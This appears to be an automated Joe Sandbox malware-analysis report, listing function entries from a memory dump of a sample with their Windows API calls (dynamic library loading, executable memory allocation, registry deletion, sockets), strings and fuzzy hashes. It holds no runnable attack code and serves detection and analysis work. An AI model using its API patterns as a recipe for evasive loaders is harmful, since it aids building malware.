Wow64DisableWow64FsRedirection, xrefs: 00C14C1D

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 79791ea41701a6d81eb6df438fdb402481d66dd76a7aaafb609f18c997d24467
Instruction ID: b2b47bb9605ee01de0b633b3d7281260b3154a55cee90a132316e62cf8e06b8b
Opcode Fuzzy Hash: 79791ea41701a6d81eb6df438fdb402481d66dd76a7aaafb609f18c997d24467
Instruction Fuzzy Hash: B4D01731611713CFDB20AFB1D91CB4ABAE5EF0A352B118C3ED496D6160E6B0D9C1CA90

Function 00C14C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C14B83,?), ref: 00C14C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C14C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00C14C50
kernel32.dll, xrefs: 00C14C3F

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: b043039cd2c1c7a0705b4a40515517551f22e1aa62a2bc3c2258239560a007ec
Instruction ID: f13eb50e1c1185ebd1ba98559b0b947af9b102e15c1abd0bee8cae8c7c73b749
Opcode Fuzzy Hash: b043039cd2c1c7a0705b4a40515517551f22e1aa62a2bc3c2258239560a007ec
Instruction Fuzzy Hash: 9BD01731610713CFDB249F31D92C74E7AE4AF06351B21883ED4A6DA560E770D9C0DA90

Function 00C90DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00C91039), ref: 00C90DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C90E07

Strings

RegDeleteKeyExW, xrefs: 00C90E01
advapi32.dll, xrefs: 00C90DF0

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: f35a110a06339770b0c1e79945a9d00f79271bd4ff4894df43a86dcce9163cd3
Instruction ID: e14fab4d990f4fd9084955d4eec83c9691a6557bef98b11a5a5dd31cd8cf428f
Opcode Fuzzy Hash: f35a110a06339770b0c1e79945a9d00f79271bd4ff4894df43a86dcce9163cd3
Instruction Fuzzy Hash: DCD01771510722CFDB209F75D80CB8AB6E5AF05352F218C7ED4D6D2161EAB0D9D0CA90

Function 00C890E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C88CF4,?,00C9F910), ref: 00C890EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C89100

Strings

kernel32.dll, xrefs: 00C890E9
GetModuleHandleExW, xrefs: 00C890FA

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: db83a498d830440c52e67e96be4b0385bf7d76777556500cf80822d9bd732503
Instruction ID: f93aea3750dd1d282e4adea9467ad80f52dd34d6f0f046bd7fca61916dfe4e4b
Opcode Fuzzy Hash: db83a498d830440c52e67e96be4b0385bf7d76777556500cf80822d9bd732503
Instruction Fuzzy Hash: 32D01735614723CFDB20AF71D81C71E76E4AF05355B16883ED496D65A0EB70C880CB90

Function 00C51714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C51718
__swprintf.LIBCMT ref: 00C51749

Strings

%.3d, xrefs: 00C51723
WIN_XPe, xrefs: 00C51788

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: fa366ab87c1b12cd8d77dcd149279d65daf1fe9b9e96169bef06a0a44d9ed0bb
Instruction ID: e408951abc613d420101a176eb3b3f08ef424e3e9366d597fed05e3952c350e8
Opcode Fuzzy Hash: fa366ab87c1b12cd8d77dcd149279d65daf1fe9b9e96169bef06a0a44d9ed0bb
Instruction Fuzzy Hash: 25D01779844108FACB009B96988DFFD777CAB0D382F181462FC06E2040E2318BD9EA29

Function 00C6717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c7456cffe0761f051c21db22a16a9f5473ee32f80362d4bf1cede0697c5f657
Instruction ID: b943913267d2342bce800a7abe144941251e86c72d86d97ed5b506b6f6bf12aa
Opcode Fuzzy Hash: 2c7456cffe0761f051c21db22a16a9f5473ee32f80362d4bf1cede0697c5f657
Instruction Fuzzy Hash: 1BC16275A04215EFCB24CFA4C888EAEBBB5FF48718B154A98E815DB351D730DE81DB90

Function 00C8E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00C8E0BE
CharLowerBuffW.USER32(?,?), ref: 00C8E101

Part of subcall function 00C8D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C8D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C8E301
_memmove.LIBCMT ref: 00C8E314

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 9dd6671b8fbeb881a6134ef0bea7c9b78c818e065bb13ca1feba2abeec1f4f89
Instruction ID: 915f07d761c89f33fd0227bd7bb3642f090449480b81d46b71f5ba3357d4aa6c
Opcode Fuzzy Hash: 9dd6671b8fbeb881a6134ef0bea7c9b78c818e065bb13ca1feba2abeec1f4f89
Instruction Fuzzy Hash: 6FC14A71608301DFC714EF28C490A6ABBE4FF89718F14896DF8999B351D731EA46CB86

Function 00C88093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C880C3
CoUninitialize.OLE32 ref: 00C880CE

Part of subcall function 00C6D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C6D5D4

VariantInit.OLEAUT32(?), ref: 00C880D9
VariantClear.OLEAUT32(?), ref: 00C883AA

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: fc8430dbc67d8266770f8eae74d5214e67f2274b4a9ddcc7db01d575f69c3909
Instruction ID: b8f3013293b3aaeb1246c70201d22d1145f2541510dbd82bc9cf200fc1ae5ba5
Opcode Fuzzy Hash: fc8430dbc67d8266770f8eae74d5214e67f2274b4a9ddcc7db01d575f69c3909
Instruction Fuzzy Hash: 93A188352047019FDB10EF14C495B6AB7E4FF8A318F448418F99A9B7A1CB30ED45EB86

Function 00C67530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CA2C7C,?), ref: 00C676EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CA2C7C,?), ref: 00C67702
CLSIDFromProgID.OLE32(?,?,00000000,00C9FB80,000000FF,?,00000000,00000800,00000000,?,00CA2C7C,?), ref: 00C67727
_memcmp.LIBCMT ref: 00C67748

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 60fbbbaa6dee016da55329436ed1765cf79f5e66675aab5a02625d7af7f1cfc7
Instruction ID: 4aea4ead734690646281b9cdae57dc4a9139467dd7c137a156d95d32762a34c1
Opcode Fuzzy Hash: 60fbbbaa6dee016da55329436ed1765cf79f5e66675aab5a02625d7af7f1cfc7
Instruction Fuzzy Hash: 00811C71A00109EFCB14DFA4C988EEEB7B9FF89315F204558F515AB250DB71AE46CB60

Function 00C6687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C6688E
SysAllocString.OLEAUT32(00000000), ref: 00C66937
VariantCopy.OLEAUT32 ref: 00C66966
VariantClear.OLEAUT32(?), ref: 00C6698D

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 2936fc656e45bbe5c22db72b94d493a2f44812a5ddb1a160c09a8f23c0c64511
Instruction ID: b3224e21028ee8ba77e1cdc44f50078453aad1ebd87fddc4eefbb56d9f11db1d
Opcode Fuzzy Hash: 2936fc656e45bbe5c22db72b94d493a2f44812a5ddb1a160c09a8f23c0c64511
Instruction Fuzzy Hash: 695193747143019ADB34AFA6D8E5B6EB3E5AF45310F20D81FE596DB292DB70E880A701

Function 00C997F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00EFED00,?), ref: 00C99863
ScreenToClient.USER32(00000002,00000002), ref: 00C99896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00C99903

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 1b23c434ed14b5254d7318180a9eb93f84924ba0e384302daea86c1f8582ce13
Instruction ID: b8a3c25fe0f1ac73aea60d7b274f99ddc7fb95796a78e762a388340735a0d222
Opcode Fuzzy Hash: 1b23c434ed14b5254d7318180a9eb93f84924ba0e384302daea86c1f8582ce13
Instruction Fuzzy Hash: 25514F34A00209EFDF10CF58D988AAE7BB5FF45360F15815DF8659B2A0D730AE41DB90

Function 00C69A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C69AD2
__itow.LIBCMT ref: 00C69B03

Part of subcall function 00C69D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C69DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C69B6C
__itow.LIBCMT ref: 00C69BC3

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: c5ed96c898579197b18e99034f6921530707d5909165d07b102f4607cfbe50de
Instruction ID: 76ff5c57393c1e5e27b87636fc9fe88015bc62784b509776d30a5331d2439811
Opcode Fuzzy Hash: c5ed96c898579197b18e99034f6921530707d5909165d07b102f4607cfbe50de
Instruction Fuzzy Hash: CE415574A00208ABDF31EF54D885FFE7BB9EF89750F000069F915A7291DB709A85EB91

Function 00C869AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00C869D1
WSAGetLastError.WSOCK32(00000000), ref: 00C869E1

Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C86A45
WSAGetLastError.WSOCK32(00000000), ref: 00C86A51

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: aa88eb8c4af8255104c822653757f6ef8c589614d53673f12dd84a9033e52dc8
Instruction ID: d6d38e175914b2be66c3fad2cd894cc2d6e20f2be170790b145e2d6e46b9b543
Opcode Fuzzy Hash: aa88eb8c4af8255104c822653757f6ef8c589614d53673f12dd84a9033e52dc8
Instruction Fuzzy Hash: B7419F75640200AFEB60BF24DC96FBA77A8DF06B14F04C018FA19AB2C2DB709D41A795

Function 00C8641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C9F910), ref: 00C864A7
_strlen.LIBCMT ref: 00C864D9

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 7efa3b1161ef0956c6d57f29ced6387c4f028ecde320d186f23fda75d157bfc0
Instruction ID: 8aa73d235dca287e2ff611a4fc7df326b615393b4d4d31755fdb02fa60a1b87a
Opcode Fuzzy Hash: 7efa3b1161ef0956c6d57f29ced6387c4f028ecde320d186f23fda75d157bfc0
Instruction Fuzzy Hash: 1341F331A00104ABCB14FBA8DCD9FEEB7A8EF45314F148159F8199B292DB30EE41EB54

Function 00C7B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C7B89E
GetLastError.KERNEL32(?,00000000), ref: 00C7B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C7B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C7B915

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 6f53f0666a1b873701c9ec269e6cdf8f4c2d35bacfe9d282259a1e87eb02d156
Instruction ID: c7c53b9debddb7469efd2ac88e815767729a29f090cd9d0e512fa77848a6e1fd
Opcode Fuzzy Hash: 6f53f0666a1b873701c9ec269e6cdf8f4c2d35bacfe9d282259a1e87eb02d156
Instruction Fuzzy Hash: DA410735600510DFDB10EF15C494A9DBBE1EF4A310F19C099ED5A9B3A2CB30EE42EB91

Function 00C98851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C988DE

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: e0b6e59016acc81966cc0d287cec476505ecd4034ab087ae6bd56516637fd07f
Instruction ID: 2a787c95a7abe090ba5abf214f38a466d610353dd47894a1d3dd0bbfcd1743d1
Opcode Fuzzy Hash: e0b6e59016acc81966cc0d287cec476505ecd4034ab087ae6bd56516637fd07f
Instruction Fuzzy Hash: 83319034600108AEEF209E58CC8DFBD77A5EB07310F954116FA25E72E1CA71EA489766

Function 00C9AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00C9AB60
GetWindowRect.USER32(?,?), ref: 00C9ABD6
PtInRect.USER32(?,?,00C9C014), ref: 00C9ABE6
MessageBeep.USER32(00000000), ref: 00C9AC57

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: e25bdb9d74973e262b2eacdbb1763a17fac4c2106330150fdb63cccb49ae42c3
Instruction ID: 0019fcc188ce50341bb8898513224ce69c1eaf3105a5116d57f898b1ec80c949
Opcode Fuzzy Hash: e25bdb9d74973e262b2eacdbb1763a17fac4c2106330150fdb63cccb49ae42c3
Instruction Fuzzy Hash: D04138306002599FCF11DF58D888BAD7BF5FB49310F1881AAE825DF265D732E941DB92

Function 00C461C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C461FB
